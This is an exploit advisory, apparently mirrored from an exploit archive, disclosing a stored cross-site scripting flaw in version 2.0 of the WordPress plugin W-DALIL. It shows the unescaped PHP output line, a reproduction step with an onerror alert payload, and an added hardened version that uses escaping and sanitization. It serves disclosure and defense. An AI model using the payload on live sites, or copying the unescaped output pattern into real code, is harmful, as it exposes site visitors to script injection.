## https://sploitus.com/exploit?id=PACKETSTORM:167595
# Exploit Title: WordPress Plugin W-DALIL - Stored Cross Site Scripting  
# Date: 27-06-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/w-dalil/  
# Version: 2.0  
# Tested on: Firefox  
# Contact me: mariamtariq404@gmail.com  
  
#Vulnerable Code:  
  
```  
<input class="dalil_input" name="dalil-address" type="text"  
placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"  
value="<?php echo $dalil_information['dalil-address']; ?>" />  
  
```  
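
A hardened form of the field above, as an added example that is not the plugin's own code or a vendor patch: the stored value is escaped for the HTML attribute context on output and sanitized before it is saved. The handler name, the nonce field and action names, and the `dalil_information` meta key are assumptions about how the plugin stores this field.

```php
<?php
// Added example, not the plugin's code.
// Output side: esc_attr() encodes quotes and angle brackets, so a stored
// value can no longer close value="" and start a new tag.
?>
<input class="dalil_input" name="dalil-address" type="text"
placeholder="<?php echo esc_attr__( 'Dalil item address', 'w-dalil' ); ?>"
value="<?php echo esc_attr( $dalil_information['dalil-address'] ?? '' ); ?>" />
<?php
// Input side (hypothetical handler; assumes the form also prints
// wp_nonce_field( 'dalil_example_save', 'dalil_example_nonce' )).
function dalil_example_save_address( $post_id ) {
    if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
        return;
    }
    if ( ! isset( $_POST['dalil_example_nonce'] )
        || ! wp_verify_nonce( sanitize_key( $_POST['dalil_example_nonce'] ), 'dalil_example_save' ) ) {
        return;
    }
    if ( ! current_user_can( 'edit_post', $post_id ) || ! isset( $_POST['dalil-address'] ) ) {
        return;
    }

    // Assumed storage: one post meta array holding all Dalil fields.
    $info = get_post_meta( $post_id, 'dalil_information', true );
    if ( ! is_array( $info ) ) {
        $info = array();
    }

    // sanitize_text_field() strips tags, line breaks and invalid UTF-8.
    $info['dalil-address'] = sanitize_text_field( wp_unslash( $_POST['dalil-address'] ) );
    update_post_meta( $post_id, 'dalil_information', $info );
}
add_action( 'save_post', 'dalil_example_save_address' );
```

Escaping on output is the control that closes this issue, since it also covers values already stored before the change; sanitizing on save only limits what new entries can contain.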
  
#Steps To Reproduce :  
  
1 - First install the plugin "*w-dalil*" and activate it.  
2 - Go to Dalil -> Add New Dalil item  
3 - Inside the “*Dalil item address*” enter XSS payload “*><img src=x onerror=alert(1)>*" and hit enter.  
  
#Poc Image :  
  
https://imgur.com/JPG97oh